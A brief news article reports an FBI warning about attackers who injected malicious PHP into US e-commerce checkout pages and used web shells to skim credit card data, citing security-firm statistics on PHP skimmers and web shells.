Te FBI states that unidentified hackers created a backdoor into a victim’s system and accessed their credit card data.

The FBI has issued a warning stating that unidentified individuals have been scraping credit card data from the checkout pages of US websites and E-commerce business owners are starting to get worried.

“As of January 2022, unidentified cyber actors unlawfully scraped credit card data from a US business by injecting malicious PHP Hypertext Preprocessor (PHP) code into the business’ online checkout page and sending the scraped data to an actor-controlled server that spoofed a legitimate card processing server,” the FBI said.  

Attacks similar to these began back in September 2020, and at that time, the PHP functions were tracked and deterred before substantial damage occurred. Earlier this year, it was reported that they changed tactics by implementing a different version of the PHP Code.

PHP a common attack vector

According to resources from law agencies, the hackers first establish a backdoor into the user’s system by using a debugging function that allows the system to download two web shells onto any US firm’s server. After establishing, a backdoor, they have a way to exploit data as much as they like.

A security firm Scuri stated that about 41% of the new credit card skimming tactics belonged to the PHP credit card skimming samples from 2021.

Web shell backdoors give attackers full access to the users file systems. It provides them with a powerful functionality that enables them to change file permissions and lets them move those files into adjacent directories. According to the data gathered by Scuri, web shells account for 19% out of 400 new malware signatures.   

The firm saw many e-commerce sites running on Magento, WordPress, and Open Cart affected by these attackers in 2021. Only the future will tell how organizations will deter these attacks.